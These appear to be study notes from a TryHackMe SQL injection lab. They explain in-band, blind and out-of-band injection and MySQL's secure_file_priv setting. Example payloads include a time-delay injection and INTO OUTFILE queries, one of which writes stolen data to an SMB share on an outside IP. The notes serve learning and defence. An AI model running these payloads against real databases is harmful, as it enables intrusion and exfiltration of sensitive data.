SQL Injection
https://tryhackme.com/room/advancedsqlinjection
Types of SQLi
In-Band
Here the attacker directly uses an input field or something similar to manipulate SQL queries and carry out malicious activities. Here the same, one communication channel is used for injection and retrieval of data. Error-based and Union-based SQLi are two examples.
Error-Based: The motive here is to reproduce error messages that reveal sensitive information such as database structure, version etc.
UNION-Based: Here the
UNIONoperator in SQL is used to get combined results of multipleSELECTstatements. This is used to retrieve data from multiple tables too.
Inferential or Blind SQLi
This is relatively harder to carry out on the target because the attacker can't directly get results of injection like In-Band. Here, the malicious payload is executed and sent, and the overall behavior of the application is observed in order to see if the injection worked or not. Time-Based and Boolean-Based SQLi are two examples
Time-Based: Here, the attacker can delay response for a specified time if the condition was true or false. For example, loading of a page or retrieval of some data can be delayed by a specified amount of time and the attacker can then know that the target is vulnerable to SQLi. Example:
SELECT * FROM users WHERE id = 1; IF (1=1) WAITFOR DELAY '00:00:05'--Boolean-Based: Here a query is sent to the target which makes the target send a different response based on the set condition. The attacker can analyze the differences in the target's response then and know if the payload got executed.
Out-of-Band SQLi
Here the attacker cannot use the same channel to carry out injection and retrieve results. Here a different channel is used to get the results from the target. For example, if the database server on the target allows outbound traffic or network functions then it can send results of executed payloads to a remote server controlled by the attacker via HTTP or DNS.
This approach is reliable and stealthy because it minimizes the risk of detection of any malicious activity. The attacker can maintain a connection with the compromised system without making any direct interactions with the database which is often monitored for malicious executions. Here a crafted query is used to write to another communication channel. For example:
SELECT information from user_Data INTO OUTFILE '/tmp/target.txt';Below is an example of writing the output to a SMB share.
SELECT sensitive_data INTO OUTFILE '\\\\10.10.162.175\\logs\\out.txt';After executing this the user can grab the file from the target via SMB or a HTTP server. The above query can be modified according to the implemented database on the target for example MSSQL, Oracle etc.
secure_file_priv in MySQL
secure_file_priv in MySQLSometimes there might be this MySQL system variable set which might have a directory or a path name set. If the variable is set then MySQL will only file writes to the specified directory and nowhere else. Hence the INTO OUTFILE operation will be restricted and the attacker won't be able to exfiltrate data to locations of their choice.
If the secure_file_priv variable is empty then no restrictions will be in place.
Last updated